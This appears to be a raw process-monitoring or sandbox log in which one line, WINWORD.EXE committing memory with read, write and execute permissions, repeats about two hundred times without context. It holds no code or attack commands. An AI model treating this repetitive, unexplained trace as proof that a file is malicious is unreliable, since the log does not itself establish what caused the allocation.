C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
